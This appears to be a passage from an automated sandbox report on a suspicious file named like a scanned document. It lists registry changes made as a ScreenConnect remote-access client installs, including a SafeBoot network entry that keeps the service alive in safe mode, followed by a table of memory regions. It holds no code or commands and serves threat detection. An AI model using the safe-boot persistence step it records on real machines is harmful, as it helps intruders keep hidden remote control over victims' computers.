HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
|
lock!100000001a2f1207ac040000d4170000000000000000000070aa1f208815db01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
|
lock!0e0000001a2f1207ac040000d4170000000000000000000070aa1f208815db01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
|
lock!0c0000001a2f1207ac040000d4170000000000000000000070aa1f208815db01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
|
lock!0a0000001a2f1207ac040000d4170000000000000000000070aa1f208815db01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
|
lock!080000001a2f1207ac040000d4170000000000000000000070aa1f208815db01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
|
lock!060000001a2f1207ac040000d4170000000000000000000070aa1f208815db01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975
|
lock!040000001a2f1207ac040000d4170000000000000000000070aa1f208815db01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
|
PreparedForExecution
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
|
lock!110000002a2f1207ac040000d417000000000000000000001d0d22208815db01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
|
ScreenConnect.ClientService.exe_5e8c1e841cd8db20
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
|
ScreenConnect.WindowsBackstageShell.exe_89b7a517a15abfdc
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
|
ScreenConnect.WindowsFileManager.exe.config_5db10293a642be8a
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
|
ScreenConnect.WindowsClient.exe.config_432322067acab5c0
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
|
ScreenConnect.WindowsBackstageShell.exe.config_bc78256f1e952942
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files
|
ScreenConnect.WindowsFileManager.exe_74b82db4db38179e
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\Files
|
ScreenConnect.Windows.dll_fa5f7fd8f7c108bb
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\Files
|
ScreenConnect.ClientService.dll_5e8c1e5c1cd8d9ee
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\Files
|
ScreenConnect.WindowsClient.exe_fd0fcfe1fd1a6cd2
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\Files
|
ScreenConnect.Core.dll_963930cc5ced28c7
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\Files
|
ScreenConnect.Client.dll_7b0ea606092ddbcb
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
|
SubstructureCreated
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
|
Blob
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
|
Blob
|
||
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
|
ProgramId
|
||
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
|
FileId
|
||
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
|
LowerCaseLongPath
|
||
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
|
LongPathHash
|
||
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
|
Name
|
||
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
|
OriginalFileName
|
||
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
|
Publisher
|
||
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
|
Version
|
||
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
|
BinFileVersion
|
||
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
|
BinaryType
|
||
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
|
ProductName
|
||
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
|
ProductVersion
|
||
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
|
LinkDate
|
||
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
|
BinProductVersion
|
||
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
|
AppxPackageFullName
|
||
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
|
AppxPackageRelativeId
|
||
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
|
Size
|
||
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
|
Language
|
||
\REGISTRY\A\{b041dedd-8c82-1dc0-d00e-996b85d2c887}\Root\InventoryApplicationFile\scan_doc_09_16_2|9b2219d344e2c40c
|
Usn
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\2C85006A1A028BCC349DF23C474724C055FDE8B6
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\B68D8F953E551914324E557E6164D68B9926650C
|
Blob
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02vnquskfpppcivc
|
Reason
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02qnlaiyfkqjflos
|
DeviceId
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02qnlaiyfkqjflos
|
Provision Wednesday, October 02, 2024 00:23:00
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02qnlaiyfkqjflos
|
AppIdList
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02gfcilbgfbgtour
|
Request Wednesday, October 02, 2024 00:23:04
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02gfcilbgfbgtour
|
Response Wednesday, October 02, 2024 00:23:04
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02gfcilbgfbgtour
|
Reason
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02vnyqymuixxsanc
|
DeviceId
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02vnyqymuixxsanc
|
AppIdList
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02vnquskfpppcivc
|
AppIdList
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18
|
ValidDeviceId
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL
|
GlobalDeviceUpdateTime
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02qnlaiyfkqjflos
|
DeviceId
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18
|
ValidDeviceId
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC
|
Data
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02qnlaiyfkqjflos
|
DeviceId
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02qnlaiyfkqjflos
|
DeviceId
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003
|
ValidDeviceId
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02gfcilbgfbgtour
|
AppIdList
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\AuthCookies\Live\Default\DIDC
|
Data
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02vnyqymuixxsanc
|
DeviceId
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003
|
ValidDeviceId
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\AuthCookies\Live\Default\DIDC
|
Data
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02vnyqymuixxsanc
|
DeviceId
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\ExtendedProperties
|
LID
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\AuthCookies\Live\Default\DIDC
|
Data
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02vnyqymuixxsanc
|
DeviceId
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
|
lock!0e000000c8916100f01d0000f41d0000000000000000000012a620cc8214db01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
|
lock!0c000000c8916100f01d0000f41d0000000000000000000012a620cc8214db01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
|
lock!0a000000c8916100f01d0000f41d0000000000000000000012a620cc8214db01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
|
lock!08000000c8916100f01d0000f41d0000000000000000000012a620cc8214db01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
|
lock!06000000c8916100f01d0000f41d0000000000000000000012a620cc8214db01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
|
lock!04000000c8916100f01d0000f41d0000000000000000000012a620cc8214db01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975
|
lock!02000000c8916100f01d0000f41d0000000000000000000012a620cc8214db01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106
|
lock!1c000000d8916100f01d0000f41d00000000000000000000300823cc8214db01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413
|
lock!1a000000d8916100f01d0000f41d00000000000000000000300823cc8214db01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471
|
lock!18000000d8916100f01d0000f41d00000000000000000000300823cc8214db01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436
|
lock!16000000d8916100f01d0000f41d00000000000000000000300823cc8214db01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a
|
lock!14000000d8916100f01d0000f41d00000000000000000000300823cc8214db01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92
|
lock!12000000d8916100f01d0000f41d00000000000000000000300823cc8214db01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975
|
lock!10000000d8916100f01d0000f41d00000000000000000000300823cc8214db01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
|
lock!1d000000e7916100f01d0000f41d00000000000000000000666a25cc8214db01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_188970e3844df7b6
|
LastRunVersion
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gc_scre..tion_d0aeae01f8c2b957
|
LastRunVersion
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gi_scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
LastRunVersion
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc
|
HasRunBefore
|
||
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ScreenConnect Client (73549b67-726b-470e-ab1a-fbbb83a6a15b)
|
NULL
|
||
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
|
AutoBackupLogFiles
|
||
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\ScreenConnect
|
EventMessageFile
|
||
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (73549b67-726b-470e-ab1a-fbbb83a6a15b)
|
ImagePath
|
There are 215 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
7FF8491A4000
|
trusted library allocation
|
page read and write
|
||
1A7287E000
|
stack
|
page read and write
|
||
7FF849000000
|
trusted library allocation
|
page read and write
|
||
7FF849130000
|
trusted library allocation
|
page read and write
|
||
22721C38000
|
heap
|
page read and write
|
||
1C5CAC02000
|
unkown
|
page read and write
|
||
227219AD000
|
heap
|
page read and write
|
||
132F1000
|
trusted library allocation
|
page read and write
|
||
247E000
|
stack
|
page read and write
|
||
22264A97000
|
heap
|
page read and write
|
||
22264AD2000
|
heap
|
page read and write
|
||
7FF8492D0000
|
trusted library allocation
|
page read and write
|
||
1E585061000
|
heap
|
page read and write
|
||
482A000
|
stack
|
page read and write
|
||
1780000
|
trusted library allocation
|
page read and write
|
||
7FF8490C5000
|
trusted library allocation
|
page read and write
|
||
37C0000
|
trusted library allocation
|
page read and write
|
||
7FF848EB0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849070000
|
trusted library allocation
|
page read and write
|
||
3E4F000
|
stack
|
page read and write
|
||
1B956000
|
stack
|
page read and write
|
||
1E57F8FE000
|
heap
|
page read and write
|
||
1404AF30000
|
heap
|
page read and write
|
||
22265333000
|
heap
|
page read and write
|
||
1E57F7B0000
|
heap
|
page read and write
|
||
85851F9000
|
stack
|
page read and write
|
||
22707F10000
|
trusted library allocation
|
page read and write
|
||
750000
|
trusted library allocation
|
page read and write
|
||
1E57F8A2000
|
heap
|
page read and write
|
||
22707F58000
|
trusted library allocation
|
page read and write
|
||
1E57F902000
|
heap
|
page read and write
|
||
7FF849150000
|
trusted library allocation
|
page read and write
|
||
B52000
|
trusted library allocation
|
page read and write
|
||
7FF848F9C000
|
trusted library allocation
|
page read and write
|
||
CC0000
|
heap
|
page read and write
|
||
668BDFE000
|
unkown
|
page readonly
|
||
3133000
|
heap
|
page execute and read and write
|
||
1B2D0000
|
heap
|
page read and write
|
||
1BF45000
|
heap
|
page read and write
|
||
8583EFE000
|
unkown
|
page readonly
|
||
1E5850F1000
|
heap
|
page read and write
|
||
7FF849190000
|
trusted library allocation
|
page read and write
|
||
2541000
|
trusted library allocation
|
page read and write
|
||
7FF848FC7000
|
trusted library allocation
|
page read and write
|
||
22721C1F000
|
heap
|
page read and write
|
||
22707F5C000
|
trusted library allocation
|
page read and write
|
||
22264B3C000
|
heap
|
page read and write
|
||
32FF000
|
trusted library allocation
|
page read and write
|
||
8584CFE000
|
unkown
|
page readonly
|
||
227207A3000
|
heap
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
5F0000
|
heap
|
page read and write
|
||
22705F5B000
|
heap
|
page read and write
|
||
FF0000
|
unkown
|
page readonly
|
||
22265375000
|
heap
|
page read and write
|
||
7FF8490A1000
|
trusted library allocation
|
page read and write
|
||
22707F50000
|
trusted library allocation
|
page read and write
|
||
8583AFE000
|
unkown
|
page readonly
|
||
AAA6B5D000
|
stack
|
page read and write
|
||
1582000
|
trusted library allocation
|
page read and write
|
||
1E5850BC000
|
heap
|
page read and write
|
||
7FF849020000
|
trusted library allocation
|
page read and write
|
||
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
22264B02000
|
heap
|
page read and write
|
||
17A0000
|
trusted library allocation
|
page read and write
|
||
858467E000
|
stack
|
page read and write
|
||
1E580740000
|
trusted library section
|
page readonly
|
||
22707F9D000
|
trusted library allocation
|
page read and write
|
||
22265332000
|
heap
|
page read and write
|
||
13FF000
|
stack
|
page read and write
|
||
9ED000
|
trusted library allocation
|
page execute and read and write
|
||
22265AD4000
|
heap
|
page read and write
|
||
12EE000
|
heap
|
page read and write
|
||
585DCFC000
|
stack
|
page read and write
|
||
227240A4000
|
heap
|
page read and write
|
||
1BC91000
|
heap
|
page read and write
|
||
496D000
|
stack
|
page read and write
|
||
1E5850C1000
|
heap
|
page read and write
|
||
3FDF000
|
trusted library allocation
|
page read and write
|
||
7FF849040000
|
trusted library allocation
|
page read and write
|
||
22721BB1000
|
heap
|
page read and write
|
||
3713000
|
trusted library allocation
|
page read and write
|
||
85849FE000
|
unkown
|
page readonly
|
||
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
7FF849192000
|
trusted library allocation
|
page read and write
|
||
22265393000
|
heap
|
page read and write
|
||
22265B2B000
|
heap
|
page read and write
|
||
1E584DA4000
|
trusted library allocation
|
page read and write
|
||
22265B2C000
|
heap
|
page read and write
|
||
831000
|
unkown
|
page execute read
|
||
22707FCC000
|
trusted library allocation
|
page read and write
|
||
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
7FF848EAC000
|
trusted library allocation
|
page execute and read and write
|
||
22717E4B000
|
trusted library allocation
|
page read and write
|
||
1C5CAC1B000
|
unkown
|
page read and write
|
||
3F8E000
|
stack
|
page read and write
|
||
1B170000
|
heap
|
page read and write
|
||
22707B70000
|
heap
|
page execute and read and write
|
||
2226537E000
|
heap
|
page read and write
|
||
227082D0000
|
trusted library allocation
|
page read and write
|
||
B15000
|
trusted library allocation
|
page execute and read and write
|
||
1E580640000
|
trusted library allocation
|
page read and write
|
||
8583FFB000
|
stack
|
page read and write
|
||
173E000
|
stack
|
page read and write
|
||
9D4000
|
trusted library allocation
|
page read and write
|
||
22720760000
|
heap
|
page read and write
|
||
858587E000
|
stack
|
page read and write
|
||
22265A8C000
|
heap
|
page read and write
|
||
B40000
|
trusted library allocation
|
page read and write
|
||
22721C0A000
|
heap
|
page read and write
|
||
2490000
|
trusted library allocation
|
page read and write
|
||
7FF848FB8000
|
trusted library allocation
|
page read and write
|
||
85847FE000
|
unkown
|
page readonly
|
||
7FF8492F0000
|
trusted library allocation
|
page read and write
|
||
11F1000
|
trusted library allocation
|
page read and write
|
||
1E5850ED000
|
heap
|
page read and write
|
||
22717FB7000
|
trusted library allocation
|
page read and write
|
||
7FF849030000
|
trusted library allocation
|
page read and write
|
||
281A000
|
trusted library allocation
|
page read and write
|
||
1200000
|
heap
|
page read and write
|
||
1C5CAC2B000
|
heap
|
page read and write
|
||
7FF849005000
|
trusted library allocation
|
page read and write
|
||
22264A7D000
|
heap
|
page read and write
|
||
7FF848FA7000
|
trusted library allocation
|
page read and write
|
||
A00000
|
heap
|
page read and write
|
||
22265ABB000
|
heap
|
page read and write
|
||
7FF848EB0000
|
trusted library allocation
|
page execute and read and write
|
||
1BBD7000
|
heap
|
page read and write
|
||
22265AB8000
|
heap
|
page read and write
|
||
8584FFE000
|
stack
|
page read and write
|
||
1635000
|
heap
|
page read and write
|
||
22265377000
|
heap
|
page read and write
|
||
B30000
|
trusted library allocation
|
page read and write
|
||
22264A47000
|
heap
|
page read and write
|
||
227062C5000
|
heap
|
page read and write
|
||
227060A0000
|
trusted library allocation
|
page read and write
|
||
585DEFE000
|
stack
|
page read and write
|
||
22264AFF000
|
heap
|
page read and write
|
||
1840000
|
heap
|
page read and write
|
||
22265B1B000
|
heap
|
page read and write
|
||
22265374000
|
heap
|
page read and write
|
||
2226535D000
|
heap
|
page read and write
|
||
22265329000
|
heap
|
page read and write
|
||
22721B4E000
|
heap
|
page read and write
|
||
22721B3E000
|
heap
|
page read and write
|
||
740000
|
heap
|
page read and write
|
||
705000
|
heap
|
page read and write
|
